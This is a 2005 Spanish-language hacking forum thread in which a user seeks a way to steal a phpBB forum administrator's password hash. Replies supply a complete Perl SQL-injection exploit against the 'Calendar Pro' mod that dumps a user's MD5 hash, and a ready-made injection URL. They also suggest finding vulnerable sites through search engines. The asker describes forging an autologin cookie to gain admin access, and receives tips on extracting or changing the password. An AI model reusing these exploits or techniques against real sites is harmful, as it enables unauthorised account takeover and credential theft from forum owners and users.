elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:59  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  phpbb
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: phpbb  (Leído 1,433 veces)
zambo

Desconectado Desconectado

Mensajes: 13


Ver Perfil
phpbb
« en: 5 Octubre 2005, 02:43 »

algun exploit para sacar la hash del administrador? por que he visto en securityfocus.com pero no se cual exactamente me la hash !!!!
En línea
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: phpbb
« Respuesta #1 en: 5 Octubre 2005, 04:27 »

algun exploit para sacar la hash del administrador? por que he visto en securityfocus.com pero no se cual exactamente me la hash !!!!

y porque no los pruebas hasta dar con el hash y asi ahorramos post ? ;)

un saludo
En línea

Conthackto.com.mx
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: phpbb
« Respuesta #2 en: 5 Octubre 2005, 05:30 »

puedes probar:

Código:
#!/usr/bin/perl -w
use IO::Socket;

## Example:
## C:\>cal_phpbb.pl www.site.com /phpBB2/ 2
##
## 'Calendar Pro' Mod for phpBB
## *************************
## [~] Connecting...
## [+] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
 
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " 'Calendar Pro' Mod <= 2.0.33 (Newest version) For phpBB\n";
print " Bug found by Axl\n";
print " Coded by CereBrums // 4/4/2005\n";
print " Usage: cal_phpbb.pl <server> <folder> <user_id>\n";
print " e.g.: cal_phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 is default for phpBB admin) \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n 'Calendar Pro' Mod for phpBB\n";
print " *****************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print " [+] Connected!\n";
print " [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print " [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
if ($take == 1) {
$in = rindex ($answer, "(");
if ( $in > -1 ) {
$pass = substr($answer,$in+1,32);
print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
exit();
}
}
if ( rindex ($answer,"cal_view_month.php?month=3&year=2005") > -1 ) {
$take = 1;
}
}
print " [-] Exploit failed\n";

#### EOF ####
 

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpbb
« Respuesta #3 en: 5 Octubre 2005, 14:11 »

hay que tonteria compilar un exploit para eso...

http://www.servidor.com/phpBB/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*

y si mejor te haces admin? jeje por lo que entiendo es inyeccion SQL, no solo lo que dice ahi..

y parece ser que tambien funciona en downloads.php

y ahora no pusiste los resultados "Google" para sitios vulnerables... son:
Resultados 1 - 10 de aproximadamente 1.160 de ???.(0,48 segundos)

Citar
phpBB Security© Thinks You Should Go Away.

You have been blocked because you have tried to a clike type script to this site & that is a potential malicious attempt to gain un-authorized access.
If you feel you have reached this message in an error due to the site, please contact the admin at forum@snailsource.com.
esto no se porque salio, si es la misma version que el de abajo.
Citar

Attempt to abuse old category exploit

DEBUG MODE

Var: -1 UNION SELECT user_password FROM phpbb_users where user_id=2/*

Line : 124
File : cal_main.inc
 
probado en 3 foros diferentes, en uno sirvio el bug en los otros 2 no.
por cierto 2 son mios,y uno de una amiga...
« Última modificación: 5 Octubre 2005, 14:27 por Sirdarckcat » En línea

Ertai
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.026


Ralph Wiggum


Ver Perfil
Re: phpbb
« Respuesta #4 en: 5 Octubre 2005, 18:18 »

Es más seguro que te funcione el del 2.0.11 o el de 2.0.10, antes que los que te han puesto...

Busca informacion en este mismo foro sobre eso.

Saludos.
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpbb
« Respuesta #5 en: 6 Octubre 2005, 00:21 »

y aparte deben tener el plug este para calenadrio..
En línea

zambo

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: phpbb
« Respuesta #6 en: 6 Octubre 2005, 03:41 »

lo que pasa es que cambio la cookie  con esto :

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

entro como administrador pero no se cu hash! ya cheque con el achilles pero la que me da no es...

¿ Una vez que estoy como admin !! como puedo saber su hash ?
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpbb
« Respuesta #7 en: 6 Octubre 2005, 14:35 »

no manches.. te funciona lo de cambiar la cookie xDDDD
si quieres el hash... has un respaldo de la base de datos, baja el archivo, y ahi esta el pass de admin.. cifrado
En línea

zambo

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: phpbb
« Respuesta #8 en: 8 Octubre 2005, 21:53 »

el admin bloque el panel y necesariamente es con pass, hay alguna otra manera de obtener su hash?
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpbb
« Respuesta #9 en: 9 Octubre 2005, 04:02 »

intenta cambiando el password desde perfil..
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines